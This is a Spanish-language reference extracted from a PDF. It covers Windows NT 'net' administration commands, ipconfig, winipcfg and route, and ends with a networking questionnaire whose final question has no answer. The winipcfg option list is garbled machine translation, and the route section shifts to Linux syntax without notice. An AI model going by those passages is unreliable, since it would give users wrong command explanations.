Para agregar las cuentas de usuario ya existentes esterv, rafar y jesust al grupo ejec en elequipo local, escriba:net group ejec esterv rafar jesust /add
Para agregar las cuentas de usuario ya existentes esterv, rafar y jesust al grupo ejec deun dominio de Windows NT Server desde un equipo con el software Windows NTWorkstation instalado, escriba:net group ejec esterv rafar jesust /add /domain
Para mostrar los usuarios del grupo ejec, escriba:net group ejec
Para agregar un comentario al registro del grupo ejec, escriba:net group ejec /comment:"Plantilla de ejecutivos."NotasEste comando puede escribirse también como net groups.Se usa el comando net group para agrupar usuarios que trabajan de un modo igual osimilar en la red. Cuando se asignen derechos a un grupo, cada miembro recibiráautomáticamente estos derechos.
La pantalla que muestra los grupos del servidor es similar a la siguiente:Cuentas de grupo de \\PRODUCCIÓN
*Admins. del dominio *Usuarios del dominio
Observe que los nombres de grupos van precedidos por un asterisco (*), que sirve paraidentificar los grupos que incluyen usuarios y grupos.
Net HelpProporciona una lista de comandos de red y temas sobre los que puede obtener ayuda, oproporciona ayuda acerca de un comando o tema específico. Los comandos de reddisponibles también se muestran en la ventana Comandos de esta Referencia decomandos, bajo la letra N.net help [comando]net comando {/help | /?}
Se escribe net help sin parámetros para mostrar una lista de comandos y temasacerca de los cuales puede obtenerse ayuda.
19
comandoEs el comando acerca del cual desea obtener ayuda. No escriba net como parte delcomando.
/helpProporciona una forma alternativa de mostrar en pantalla el texto de ayuda.
/?Muestra la sintaxis correcta del comando.
Net HelpmsgProporciona ayuda referente a un mensaje de error de Windows NT.net helpmsg mensaje_nº
Parámetros
mensaje_nºEs el número de cuatro dígitos del mensaje de Windows NT acerca del cual necesitaayuda.
Cuando falla una operación de red, se muestra un mensaje similar al siguiente:NET 2182: El servicio solicitado ya ha sido iniciado.El comando net helpmsg explica la causa de un error e indica cómo resolver elproblema.
Net LocalgroupAgrega, muestra o modifica grupos locales.net localgroup [nombre_grupo [/comment:"texto"]] [/domain]net localgroup nombre_grupo {/add [/comment:"texto"] |/delete} [/domain]net localgroup nombre_grupo nombre [...] {/add | /delete}[/domain]
Se escribe net localgroup sin parámetros para mostrar el nombre del servidor ylos nombres de los grupos locales de dicho equipo.
nombre_grupoEs el nombre del grupo que va a agregarse, expandirse o eliminarse. Proporcione sóloun nombre_grupo para ver una lista de los usuarios o grupos globales de un grupo local.
/comment:"texto"Agrega un comentario para un grupo nuevo o existente. El comentario puede tener hasta48 caracteres de longitud. Escriba el texto deseado entre comillas.
/domainRealiza la operación en el controlador principal del dominio actual. Si no se especificaeste parámetro, la operación se realizará en el equipo local.Este parámetro se aplica únicamente a equipos con Windows NT Workstation que sonmiembros de un dominio de Windows NT Server. Si no se indica lo contrario, los
20
equipos con Windows NT Server realizarán las operaciones en el controlador principaldel dominio.
nombre [...]Muestra la lista de uno o más nombres de usuario o de grupo que se agregarán a ungrupo local o se quitarán de él. Separe cada nombre con un espacio en blanco. Losnombres pueden ser usuarios locales, usuarios de otros dominios o grupos globales,pero no otros grupos locales. Si un usuario es de otro dominio, escriba el nombre deusuario después del nombre de dominio (por ejemplo, VENTAS\SAMUEL).
/addAgrega un nombre de grupo o de usuario a un grupo local. Debe establecerse una cuentapara los usuarios o grupos globales que se agreguen a un grupo local con este comando.
/deleteQuita un nombre de grupo o de usuario de un grupo local.Use el comando net localgroup para agrupar usuarios que utilizan de un modoigual o similar el equipo o la red. Cuando se asignen derechos a un grupo local, cadamiembro de dicho grupo recibirá automáticamente estos derechos.
Para mostrar una lista de todos los grupos locales del servidor local, escriba:net localgroup
Para agregar un grupo local llamado ejec a la base de datos local de cuentas de usuario,se escribe:net localgroup ejec /addPara agregar un grupo local llamado ejec a la base de datos de cuentas de usuario de undominio de Windows NT Server, escriba:net localgroup ejec /add /domain
Para agregar las cuentas de usuario ya existentes esterv, rafar (del dominio VENTAS) yjesust al grupo local ejec en el equipo local, escriba:net localgroup ejec esterv ventas\rafar jesust /add
Para agregar las cuentas de usuario ya existentes esterv, rafar y jesust al grupo ejec deun dominio de Windows NT Server, escriba:net localgroup ejec esterv rafar jesust /add /domain
Para mostrar los usuarios del grupo local ejec, escriba:net localgroup ejec
Para agregar un comentario al registro del grupo local ejec, escriba:net localgroup ejec /comment:"Plantilla de ejecutivos."
Net NameAgrega o elimina un nombre para mensajes (a veces llamado alias), o muestra la lista denombres para los que el equipo aceptará mensajes. Para poder usar net name, el serviciode Mensajería debe estar en ejecución.net name [nombre [/add | /delete]]
21
Se escribe net name sin parámetros para mostrar una lista de los nombresactualmente en uso.
nombreEspecifica el nombre que recibe mensajes. Dicho nombre puede tener un máximo de 15caracteres.
/addAgrega un nombre a un equipo. Escribir /add es opcional puesto que el resultado deescribir net name nombre es el mismo que el de escribir net namenombre /add.
/deleteQuita un nombre de un equipo.
Para ver la lista de nombres en su equipo, escriba:net name
Para agregar el nombre rsvp a su equipo, escriba:net name rsvp
Para quitar el nombre rsvp de su equipo, escriba:net name rsvp /delete
Se usa el comando net name para especificar un nombre para la recepción demensajes. Para poder usar este comando, debe haberse iniciado el servicio Mensajería.Cada nombre de mensajería debe ser único en la red. Los nombres creados con netname se destinan estrictamente a mensajes; estos nombres no son grupos.
Windows NT usa tres tipos de nombres:
Cualquier nombre para mensajería, que se agrega con net name. El nombre de equipo del equipo, que se agrega al iniciar el servicio Estación de
trabajo. Su nombre de usuario, que se agrega cuando inicia la sesión, suponiendo que su
nombre no se esté usando como nombre de mensajería en otra parte de la red.
Net PauseInterrumpe los servicios en ejecución.net pause servicio
servicioPuede ser:
Servidor de archivos para Macintosh (sólo en Windows NT Server) Servicio de publicación de FTP
En un servidor se usa el comando net pause antes de detener un servicio para permitirque los usuarios finalicen su trabajo o se desconecten de los recursos. Hacer una pausaen un servicio lo interrumpe momentáneamente, pero no elimina el software de la
22
memoria. Los usuarios que están conectados a un recurso pueden finalizar sus tareas,pero no podrán efectuar nuevas conexiones a dicho recurso.
Si se piensa detener un servicio que afecta a recursos compartidos, primerointerrúmpalo, luego envíe un mensaje con el comando net send para avisar de dichadetención; después de un lapso suficiente para que los usuarios terminen de usar elservicio, deténgalo usando el comando net stop. Para volver a activar un serviciointerrumpido, use el comando net continue.
En un cliente se usan los comandos net pause y net continue para pasar de lasimpresoras de la red a las impresoras conectadas a su estación de trabajo.
Tanto en un servidor como en un cliente no se pueden interrumpir todos los servicios.la pausa afecta a los servicios de Windows NT de las siguientes formas:
La pausa del servicio Inicio de sesión de red impide que el equipo procese laspeticiones de inicio de sesión. Si el dominio tiene otros servidores de inicio desesión, los usuarios podrán iniciar su sesión en la red.
La pausa del servicio Servidor impide que los usuarios establezcan nuevasconexiones con los recursos compartidos de éste y, si no hay otros servidores deinicio de sesión en la red, impide que los usuarios inicien su sesión en la red.Esto no afecta a una conexión existente. Los administradores pueden establecerconexiones con el servidor aunque el servicio esté interrumpido.
La pausa del servicio Estación de trabajo mantiene el nombre de usuario, lacontraseña y las conexiones definidas, pero dirige las peticiones de impresión alas impresoras conectadas al equipo, en lugar de hacerlo a las impresorasconectadas a la red.
Net PrintMuestra o controla los trabajos y las colas de impresión.net print \\nombre_equipo\recurso_compartidonet print [\\nombre_equipo] trabajo_nº [/hold | /release | /delete]
Parámetrosnombre_equipoEs el nombre del equipo que comparte las colas de impresión.
recurso_compartidoEs el nombre de la cola de impresión. Cuando incluya recurso_compartido ynombre_equipo, sepárelos con una barra invertida (\).
trabajo_nºEs el número de identificación asignado a un trabajo de impresión en una cola. Unequipo con una o más colas de impresión asigna a cada trabajo un número único. Si seestá usando un número de trabajo en una cola compartida por un equipo, dicho númerono se asignará a ningún otro trabajo, ni siquiera a otras colas de ese equipo.
/holdCuando se usa con trabajo_nº, retiene el trabajo en espera en la cola de impresión. Eltrabajo permanece en la cola y los demás trabajos lo rebasarán hasta que se libere.
23
/releaseLibera un trabajo o una cola de impresión que se ha retenida.
/deleteQuita un trabajo de la cola de impresión.
El comando net print muestra información en distintos formatos acerca de lascolas de impresión.
Puede hacer que se presente una cola en particular usando:net print \\nombre_equipo\recurso_compartido.
Lo siguiente es un ejemplo de la información presentada de todas las colas deimpresión:Colas de impresora en \\PRODUCCIÓNNombre Trabajo No. Tamaño Estado------------------------------------------------------------------Cola LÁSER trabajos *Cola activa*ERNESTA 84 0 en cola
Se utiliza net print trabajo_nº para mostrar un único trabajo de impresión.Aparecerá una pantalla similar a la siguiente:
Trabajo No. 35Estado EsperandoTamaño 3096ComentarioUsuarioMARIASLNotificar MARIASLTipo de dato del trabajoParámetrosdel trabajo Información adicional
Net SendEnvía mensajes a otros usuarios, equipos, grupos o nombres para mensajes en la red. Elservicio Mensajería debe estar en ejecución para poder recibir mensajes.net send {nombre | * | /domain[:nombre] | /users} mensaje
ParámetrosnombreEs el nombre de usuario, de equipo o nombre para mensajes al que se envía el mensaje.Si se trata de un nombre de equipo que contiene caracteres en blanco, escríbalo entrecomillas (" ").
*Envía el mensaje a todos los nombres del grupo.
/domain[:nombre]Envía el mensaje a todos los nombres del dominio del equipo. Si se especifica nombre,se enviará el mensaje a todos los nombres del dominio o grupo de trabajo especificado.
/usersEnvía el mensaje a todos los usuarios conectados al servidor.
24
Sólo se puede enviar un mensaje a un nombre que esté activo en la red. Si se envía a unnombre de usuario, éste debe haber iniciado una sesión y estar ejecutando el servicioMensajería para recibir el mensaje.
Enviar mensajes a varios usuariosWindows NT proporciona varios métodos para transmitir mensajes. Puede hacerlo atodos los nombres del dominio de su equipo (con * o /domain) o a otro dominiodiferente (/domain:nombre). Los mensajes transmitidos pueden tener hasta 128caracteres.
La opción /users permite enviar un mensaje a todos los usuarios que tienen sesionesen el servidor. Los parámetros que envían mensajes a varios usuarios deben usarse conprecaución.
Net SessionMuestra la lista o desconecta las sesiones entre un equipo local y los clientes conectadosa él.net session [\\nombre_equipo] [/delete]
ParámetrosSe escribe net session sin parámetros para que se muestre información acerca detodas las sesiones con el equipo local.
//nombre_equipoIdentifica el equipo para el cual se mostrarán o desconectarán sesiones./deleteFinaliza la sesión del equipo con \\nombre_equipo y cierra todos los archivos abiertosen el equipo para la sesión. Si se omite \\nombre_equipo, se cancelarán todas lassesiones del equipo local.
El comando net session puede escribirse también como net sessions o netsess. Se usa el comando net session para ver en pantalla los nombres de equipoy nombres de usuario de aquellos usuarios que tienen acceso a un servidor, si tienenarchivos abiertos y cuánto tiempo ha permanecido inactiva la sesión de cada uno deellos.
La pantalla es similar a la siguiente:Tipo de Equipo Usuario cliente Abiertos Inactiva----------------------------------------------------------------\\BASSETT CRISDR NT 1 00:00:13\\SANZCA Administrador DOS LM2.1 0 01:05:13
Para mostrar la sesión de un usuario, incluya \\nombre_equipo con el comando. Lapresentación de un único usuario incluye una lista de los recursos compartidos con losque el usuario tiene conexiones.
Una sesión queda registrada cuando un usuario de un cliente entra en contacto con unservidor. Esto ocurre cuando los dos sistemas están en la misma red y el servidor aceptael nombre y la contraseña del usuario. Un usuario de un cliente debe tener una sesióniniciada en el servidor antes de poder usar los recursos compartidos del mismo; una
25
sesión no se establece hasta que el usuario de un cliente se conecta a un recurso. Entreun cliente y un servidor sólo puede existir una sesión, pero puede haber varios puntos deentrada, o conexiones, a los recursos.
Para determinar el tiempo que puede permanecer inactiva una sesión antes de que sedesconecte automáticamente, active la característica autodisconnect con la opción/autodisconnect del comando net config server. El usuario no interviene en estetipo de desconexión, puesto que Windows NT reanuda automáticamente la conexión encuanto el usuario vuelve a usar el recurso.
Para finalizar una sesión con el servidor, use la opción /delete junto con\\nombre_equipo.
Net ShareCrea, elimina o muestra recursos compartidos.net share recurso_compartidonet share recurso_compartido=unidad:ruta_de_acceso[/users:número | /unlimited] [/remark:"texto"]net share recurso_compartido [/users:número | unlimited][/remark:"texto"]net share {recurso_compartido | unidad:ruta_de_acceso}/delete
ParámetrosSe escribe net share sin parámetros para mostrar información acerca de todos losrecursos compartidos en el equipo local.
recurso_compartidoEs el nombre de red del recurso compartido. Escriba net share con unrecurso_compartido únicamente para mostrar información acerca de dichorecurso compartido.
unidad:ruta_de_accesoEspecifica la ruta de acceso absoluta del directorio que va a compartirse.
/users:númeroEstablece el número máximo de usuarios que pueden tener acceso simultáneamente alrecurso compartido.
/unlimitedEspecifica que puede tener acceso simultáneamente al recurso compartido un númeroilimitado de usuarios.
/remark:"texto"Agrega un comentario descriptivo acerca del recurso. Escriba el texto entre comillas.
/deleteDeja de compartir un recurso.
26
Se utiliza el comando net share para compartir recursos. Para compartir undirectorio con una ruta de acceso que contiene un carácter en blanco, escriba la unidad yla ruta del directorio entre comillas (" ").
Cuando se muestran todos los recursos compartidos de un equipo, Windows NT indicael nombre del recurso compartido, el nombre o nombres de dispositivo o rutas de accesoasociadas con el recurso y un comentario descriptivo acerca de éste.
La presentación en pantalla es similar a la siguiente:Nombre Recurso Comentario-----------------------------------------------------------------ADMIN$ C:\WINNT AdminRemotaC$ C:\ Uso internoprint$ C:\WINNT\SYSTEM\SPOOL IPC$IPC remotaLÁSER LPT1 En cola Impresora Láser
Los recursos compartidos de un servidor se guardan a medida que se crean. Cuandodetenga el servicio Servidor, todos los recursos compartidos se desconectarán, pero sevolverán a conectar automáticamente en cuanto vuelva a iniciarse el servicio o cuandose reinicie el equipo.
Net StartInicia un servicio o muestra una lista de los servicios iniciados. Los nombres deservicios que son de dos o más palabras, como Inicio de sesión de red o Examinador deequipos, deben estar entre comillas (").net start [servicio]
Net StopDetiene un servicio de Windows NT.net stop servicio
ParámetrosservicioPuede ser alerta, servicio de cliente para netware, servidor del Portafolio, examinador deequipos, duplicador de directorios, servicio de publicación de FTP, lpdsvc, mensajería,inicio de sesión de red, agente de supervisión de red, proveedor de seguridad NT, ole,administrador de conexiones de acceso remoto, servicio isnsap de acceso remoto,servidor de acceso remoto, localizador de llamada a procedimientos remotos (rpc),schedule, servidor, servicios simples de tcp/ip, snmp, spooler, ayuda de netbios detcp/ip, sai y estación de trabajo.
Net UseConecta o desconecta un equipo de un recurso compartido o muestra información acercade las conexiones del equipo. También controla las conexiones de red persistentes.net use [nombre_dispositivo][\\nombre_equipo\recurso_compartido [\volumen]] [contraseña| *]] [/user:[nombre_dominio\]nombre_usuario] [[/delete] |[/persistent:{yes | no}]]net use nombre_dispositivo [/home[contraseña | *]][/delete:{yes | no}]net use [/persistent:{yes | no}]
27
ParámetrosEscriba net use sin parámetros para obtener una lista de las conexiones de red.
nombre_dispositivoAsigna un nombre para la conexión al recurso o especifica el dispositivo que se va adesconectar. Hay dos tipos de nombres de dispositivos: unidades de disco (D a Z) eimpresoras (LPT1 a LPT3). Escriba un asterisco en lugar de un nombre específico dedispositivo para asignar el siguiente nombre de dispositivo disponible.
//nombre_equipo\recurso_compartidoEs el nombre del servidor y del recurso compartido. Si el nombre de equipo contienecaracteres en blanco, escriba la barra invertida doble (\\) y el nombre entre comillas (""). El nombre de equipo puede tener entre 1 y 15 caracteres.
/volumenEspecifica un volumen NetWare del servidor. Para poder conectarse con servidoresNetWare debe tener instalado y estar ejecutando el Servicio de cliente para NetWare(Windows NT Workstation) o el Servicio de puerta de enlace o gateway para NetWare(Windows NT Server).
*Pide por la contraseña. Los caracteres no se muestran en pantalla a medida que losescribe.
/userEspecifica un nombre de usuario diferente con el que se realiza la conexión.
nombre_dominioEspecifica otro dominio. Por ejemplo, net use d:\\servidor\recurso_compartido /user:admin\mario conecta elusuario mario de la misma forma que si la conexión se realizara desde el dominioadministrador. Si se omite el dominio, se usará aquél en el que tenga lugar la conexiónactual.
nombre_usuarioEspecifica el nombre de usuario con el que se iniciará la sesión.
/homeConecta un usuario con su directorio particular.
/deleteCancela la conexión de red especificada. Si el usuario especifica la conexión medianteun asterisco se cancelarán todas las conexiones de red.
/persistentControla el uso de conexiones de red persistentes. El valor predeterminado es la últimaconfiguración utilizada. Las conexiones sin dispositivos no son persistentes.
28
yesGuarda todas las conexiones tal como se realizaron y las restaura en el siguiente iniciode sesión.
noNo guarda la conexión en curso ni las siguientes. Las existentes se restaurarán en elsiguiente inicio de sesión. Use el modificador /delete para eliminar conexionespersistentes.
Net UserAgrega o modifica cuentas de usuario o muestra información acerca de ellas.net user [nombre_usuario [contraseña | *] [opciones]][/domain]net user nombre_usuario {contraseña | *} /add [opciones][/domain]net user nombre_usuario [/delete] [/domain]
ParámetrosEscriba net user sin parámetros para ver una lista de las cuentas de usuario delequipo.
nombre_usuarioEs el nombre de la cuenta de usuario que se desea agregar, eliminar, modificar o ver. Elnombre de la cuenta de usuario puede tener hasta 20 caracteres.contraseñaAsigna o cambia una contraseña para la cuenta de usuario. Una contraseña debe tener lalongitud mínima establecida con la opción /minpwlen del comando netaccounts y puede tener un máximo de 14 caracteres.
*Pide la contraseña. Los caracteres no se muestran en pantalla a medida que los escribe.
/domainRealiza la operación en el controlador principal del dominio principal del equipo.Este parámetro se aplica únicamente a equipos con Windows NT Workstation que sonmiembros de un dominio de Windows NT Server. De forma predeterminada, losequipos con Windows NT Server realizan las operaciones en el controlador principal dedominio.
NOTA: Esta acción se lleva a cabo en el controlador principal del dominio principal delequipo. Puede que no se inicie la sesión en el dominio.
/addAgrega una cuenta de usuario a la base de datos de cuentas de usuario.
/deleteQuita una cuenta de usuario de la base de datos de cuentas de usuario.
Opciones/active:{no | yes}
29
Desactiva o activa la cuenta de usuario. Si no está activa, el usuario no puede teneracceso a los recursos del equipo. El valor predeterminado es yes (activa).
/comment:"texto"Proporciona un comentario descriptivo acerca de la cuenta de usuario. Puede tener hasta48 caracteres. Escriba el texto entre comillas.
/countrycode:nnnUsa los códigos de país del sistema operativo para instalar los archivos de ayuda ymensajes de error en el idioma especificado. Un valor 0 significa el código de paíspredeterminado.
/expires:{fecha | never}El parámetro fecha establece una fecha de caducidad de la cuenta de usuario, mientrasque never determina una duración ilimitada de dicha cuenta. Las fechas de caducidadpueden darse en el formato mm/dd/aa, dd/mm/aa o mm,dd,aa, dependiendo de/countrycode. Observe que la cuenta caduca al comienzo de la fecha especificada.Los meses pueden indicarse con un número, con todas sus letras o abreviados con tresletras. Los años pueden constar de dos o cuatro dígitos. Utilice comas o barrasdiagonales para separar las partes de la fecha (no espacios en blanco). Si se omite aa, seasume el año de la siguiente fecha (de acuerdo con la fecha y hora de su equipo).
/fullname:"nombre"Agrega un determinado nombre al usuario en lugar de su nombre de usuario normal.Escriba dicho nombre entre comillas./homedir:ruta_accesoEstablece la ruta de acceso del directorio particular del usuario. Dicha ruta debe ser unaya existente.
/homedirreq:{yes | no}Establece si es necesario un directorio particular.
/passwordchg:{yes | no}Especifica si los usuarios pueden cambiar su contraseña. El valor predeterminado esyes.
/passwordreq:{yes | no}Especifica si una cuenta de usuario debe tener una contraseña. El valor predeterminadoes yes.
/profilepath[:ruta_acceso]Establece una ruta de acceso para el perfil de inicio de sesión del usuario. Dicha rutalleva a un perfil de registro.
/scriptpath:ruta_accesoEstablece una ruta de acceso al archivo de comandos de inicio de sesión del usuario.Ruta_acceso no puede ser una ruta absoluta; es relativa a%raíz_sistema%\SYSTEM32\REPL\IMPORT\SCRIPTS.
/times:{horas | all}
30
Especifica las horas en las que se permite al usuario el uso del equipo. El valor horas seexpresa como día [-día][,día[-día]] ,hora[-hora][,hora[-hora]], limitado a incrementos deuna hora. Los días se pueden deletrear o abreviar (L,M,Mi,J,V,S,D). Las horas sepueden escribir en formato de 12 ó 24 horas. Para el formato de 12 horas, use AM, PM,o A.M., P.M. El valor all significa que un usuario puede iniciar una sesión encualquier momento. Un valor nulo (en blanco) significa que un usuario nunca puedeiniciar la sesión. Separe el día y la hora mediante comas, y las unidades de día y horacon punto y coma (por ejemplo, L,4AM-5PM;M,1AM-3PM). No use espacios en laespecificación de /times.
/usercomment:"texto"Permite que un administrador agregue o cambie el "Comentario de usuario" de lacuenta. Escriba el texto entre comillas.
/workstations:{nombre_equipo [,...] | *}Lista de hasta ocho estaciones de trabajo desde las que un usuario puede iniciar unasesión en la red. Separe los nombres de las estaciones con una coma. Si/workstation no es una lista o ésta es igual a un *, el usuario puede iniciar unasesión desde cualquier equipo.
WINIPCFG.- Para saber la dirección IP que tenemos asignada se utiliza el comandoWINIPCFG (en Windows 98, Me).
opciones./ ALL todos visualizan la información detallada - usted consigue un botón que ustedpuede hacer clic sin usar esto./ Batch el tratamiento por lotes [ fichero ] escribe al o / winifcfg.out del fichero/ Renew_all renueva todos los adaptadores/ Release_all desbloquear de Release_all todos los adaptadores/ Renew N renueve N renuevan el adaptador N/ Release N adaptador N del desbloquear del desbloquear N
Si ejecutamos el comando WINIPCFG el resultado es el siguiente:
31
IPCONFIG.- muestra la configuración del protocolo de Internet.
ipconfig [/? | /all | /renew [adapter] | /release [adapter] |/flushdns | /displaydns | /registerdns |/showclassid adapter |/setclassid adapter [classid] ]
dondeadaptador nombre de conexión
(se permiten caracteres comodines * y ?, vea los ejemplos)
Opciones:/? muestra la ayuda/all muestra toda la información de configuración./release libera la dirección IP para el adaptador específico./renew renueva la dirección IP para el adaptador específico./flushdns purga la caché de resolución de DNS./registerdns actualiza todas las concesiones y vuelve a registrar los
nombres DNS./displaydns muestra el contenido de la caché de resolución DNS./showclassid muestra todas las id. de clase dhcp permitidas para
este adaptador./setclassid modifica la id. de clase dhcp.
De manera predeterminada se muestra solamente la dirección IP, la máscara de subred yla puerta de enlace para cada adaptador enlazado con TCP/IP.
Para Release y Renew, si no hay ningún nombre de adaptador especificado, se libran orenuevan las concesiones de dirección IP enlazadas con TCP/IP.
Para Setclassid, si no hay ClassId especificada, se quita ClassId.
Ejemplos:> ipconfig ... muestra información> ipconfig /all ... muestra información detallada> ipconfig /renew ... renueva todos los adaptadores> ipconfig /renew EL* ... renueva cualquier conexión cuyo nombre
comience con EL> ipconfig /release *Con* ... libera todas las conexiones que coincidan
por ejemplo:"Conexión de área local 1" o"Conexión de área local 2"
ROUTE.- El comando route se utiliza para visualizar y modificar la tabla de rutas.Route print muestra una lista con las rutas actuales conocidas por IP para el equipo.Route add se utiliza para añadir rutas a la tabla de rutas, y route del se utiliza para borrarrutas de la tabla.Para añadir a la tabla de rutas una ruta hacia una red se utilizará el siguiente formato:
route add -net <dir_ip> netmask <máscara> [gw <dir_ip_gateway>] dev <interfaz>en el que los argumentos tienen el siguiente significado:
32
dir_ip. Route puede utilizarse para establecer rutas estáticas hacia equipos yredes vía una interfaz de red una vez que se ha configurado esta última mediantela utilidad ifconfig. La mayor parte de las veces se utilizará para establecer rutashacia redes, por lo que debe utilizarse con la opción -net, con lo que dir_ip seinterpretará como una dirección de red para la que se desea establecer una ruta.Si el servicio de nombres de dominio DNS está configurado y funcionandocorrectamente, puede utilizarse un nombre simbólico en lugar de una direcciónIP. Si se desea establecer una ruta a un equipo, deberá utilizarse la opción -host.
máscara especifica la máscara de red para la ruta que se desea añadir. Durante elproceso de encaminamiento de cada paquete IP se realizará una operación lógicaAND entre la dirección IP destino contenida en su cabecera y esta máscara. Si elresultado de dicha operación coincide con la dir_ip, se utilizará esta entrada de latabla de rutas para realizar el encaminamiento de dicho paquete IP. Si no seindica una máscara de red, se utilizará una de las máscaras por omisión para lasclases de direcciones A, B y C en función de la clase a la que pertenezca dir_ip.Si el destino de la ruta es un equipo, deberá utilizarse como máscara255.255.255.255.
dir_ip_gateway. Cuando se utiliza la entrada que se está creando en la tabla derutas para enviar un paquete IP, dicho paquete se encaminará a través delgateway indicado en esta opción. Dicho gateway debe poder ser alcanzado, porlo que previamente deberá haberse establecido una ruta hacia el mismo (porejemplo utilizando el comando route add con la opción -host). Si se especifica ladirección IP de una de las interfaces de red locales, se utilizará ésta para decidirla interfaz hacia la que se encaminarán los paquetes. Es opcional, solo aparececuando es necesario encaminar hacia un gateway.
En interfaz debe proporcionarse el nombre de la interfaz de red que se deseautilizar en esta ruta. Generalmente el nombre de interfaz se forma a partir de unnombre de manejador seguido de un número de unidad. El nombre de manejadorpara redes Ethernet es eth. Las unidades comienzan a numerarse a partir de 0(eth0, eth1, etc.).
Para eliminar una ruta debe utilizarse la sintaxis# route del -net <dir_ip> <num_unos_mascara> <Destination> gw <Gateway>
netmask <Genmask>Donde:
num_unos_mascara es un entero que indica el número de '1's que tiene lamáscara de dicha red. A continuación se describen brevemente algunos de loscampos de la tabla de rutas mostrada por el comando route. Para obtener unadescripción completa de todos los campos, así como del resto de opcionesutilizadas por el comando route, puede consultarse la ayuda en línea de Linux(man route).
El campo Destination muestra el equipo o la red destino de una ruta. Puedevisualizarse tanto su dirección IP como su nombre simbólico DNS.
El campo Gateway muestra la dirección IP o el nombre simbólico del routerutilizado en una ruta. Un * en este campo significa que no se utiliza ningúnrouter para dicha entrada.
El campo Genmask muestra la máscara para la red destino. Si el destino es unequipo, este campo muestra la máscara 255.255.255.255.
33
Los flags más frecuentemente mostrados en el campo Flags tienen el siguientesignificado: U Indica que la ruta se encuentra activa. H indica que el destino esun equipo, no una red y G Indica que se utiliza un Gateway para encaminar.
El campo Iface indica la interfaz de red a la que se enviarán los paquetes parauna ruta determinada.
CUESTIONARIO
1.- Para que sirven los sokets.
Los sockets no son más que puntos o mecanismos de comunicación entre procesosque permiten que un proceso hable ( emita o reciba información ) con otro procesoincluso estando estos procesos en distintas máquinas. Esta característica de ínterconectividad entre máquinas hace que el concepto de socket nos sirva de gran utilidad.Esta interfaz de comunicaciones es una de las distribuciones de Berkeley al sistemaUNIX, implementándose las utilidades de ínter conectividad de este Sistema Operativo (rlogin, telnet, ftp, ... ) usando sockets.
2.-Que función realiza el protocolo TCP en una transmisión y como se relaciona con elprotocolo IP.
TCP utiliza un flujo de bytes para enviar y recibir datos, además de proporcionar uncircuito virtual para las comunicaciones en red. La relación entre TCP e IP es queTCP utiliza IP para entregar datos entre computadoras, el cual es un protocolo noconfiable, y aún así TCP se mantiene confiable. TCP puede entregar datos con flujo debytes usando datagramas IP para hacerlo e IP entrega los datos de TCP.
3.-Como localiza una dirección IP un servidor de nombres , cuando se hace un ping auna dirección ip.
Supóngase que se tiene una máquina Linux conectada a una LAN de servidores Unix ysu nombre es erdos, cuando nuestra aplicación quiera buscar la información de erdos,contactará con un servidor de nombres local, quien lleva a cabo una secuencia depeticiones. En primer lugar pregunta al servidor de nombres raíz, preguntando porerdos.maths.groucho.edu. El servidor raíz reconoce que el nombre no pertenece aninguna de sus zonas de autoridad pero sí sabe qué hacer con la zona edu. Esto es,devuelve a nuestro servidor más información sobre los servidores de nombres quepueden servir la zona edu. Ahora nuestro servidor preguntará por este nombre a uno deesos servidores. Ellos nos enviarán a uno que tenga información autorizada deldominio groucho.edu. Ahora nuestro servidor interrogará a éste y finalmente obtendrála dirección de erdos. Para acelerar futuras peticiones de nombres, el servidoralmacena la información obtenida en la búsqueda anterior en su cache local. Así, lapróxima vez que busquemos algún nodo de groucho.edu, ya no habrá que ir a losservidores raíz o los de la zona edu.
34
4.-Cual es el proceso que sigue el Telnet para realizar una conexión.
Primeramente crear una conexión de red TCP con el servidor, después acepta lo que se escribe en el teclado, de manera conveniente, entonces reformatea la entrada de datosa un formato estándar para enviarla al servidor después se acepta la respuesta del servidor en formato estándar y sereformatea esa salida para desplegarla en la pantalla del usuario cliente.
5.-Que es el protocolo ftp y que es un ftp anónimo.
Es un protocolo orientado a conexión que define los procedimientos para latransferencia de archivos entre dos nodos de la red (cliente/servidor). Un FTP anónimoes cuando se recuperan archivos de depósitos públicos localizados en toda Internet sinnecesidad de contar con un clave de usuario para poder tener acceso a ellos.
6.-Como realiza la entrega de un mensaje el protocolo SMTP
El núcleo del sistema de correo electrónico de Internet es el Agente de Transporte deCorreo (MTA) que representa al sistema de correo ante una computadora, después deque el software Agente de Usuario de Correo (MAU) envía un mensaje de correo a unacola, el MTA lo retira y transmite a otro MTA. Este proceso de pasar de un MTA a otrocontinúa hasta que el mensaje llega a la dirección destino
7.-Para que sirve el protocolo SNMP y donde se utiliza
Es el protocolo de administración y monitoreo de redes provisto por la suite de TCP/IP.SNMP define un esquema basado en el concepto cliente/servidor. En ese sentido, unared consiste de uno o más servidores de administración de red (Network ManagementStations) y elementos de red administrables o agentes. El servidor SNMP ejecutaoperaciones de monitoreo y control sobre las estaciones que poseen el agente.
8.-Cual es el proceso que sigue el protocolo http para la realización de una conexión
El cliente contacta al servidor en un número de puerto bien conocido (80). Entoncesenvía una solicitud de documento al especificar un comando HTTP llamado método,seguido por una dirección de documento y una versión de HTTP. Por ejemplo: GET/index.html HTTP/1.0, se usa el método GET para solicitar el documento index.htmlusando la versión 1 de http, después, el cliente envía un encabezado opcional parainformar al servidor de su configuración y los formatos de documentos que aceptará.Toda la información del encabezado es dada línea por línea, cada una con un nombrede encabezado y su valor . El cliente envía una línea en blanco para terminar elencabezado, después de enviar las solicitudes y el encabezado el cliente puede enviardatos adicionales.
35
El servidor responde con una línea de estado que contiene 3 campos: la versión deHTTP, un código de status y una descripción. La versión de HTTP indica la versión queusa el servidor para responder. El código de status es un número de 3 dígitos queindica el resultado del servidor para la solicitud del cliente. La descripción siguiente esel texto legible que describe el código de statu, después de la línea de status, el servidorenvía información de encabezado al cliente sobre si mismo y el documento solicitado,donde una línea en blanco termina el encabezado.
Si una solicitud de cliente es exitosa, los datos solicitados son enviados. Estos datospueden ser una copia del archivo, o la respuesta de un programa CGI. Si la solicitud deun cliente no puede ser cumplida, los datos adicionales podrían ser una explicaciónlegible de porque el servidor no pudo cumplir lo solicitado.
9.-En base al protocolo TCP, que información proporciona el comando netstat mientrasestamos trabajando en Internet con varias aplicaciones.
Muestra la actividad de la red en el sistema, los paquetes emitidos y recibidos, erroresy conexiones, red local y nombre del sistema además de las tablas de enrutamiento ylas conexiones activas en los puertos.
10.-Que registros puede contener una base de datos DNS, y cuales son los mascomunes.
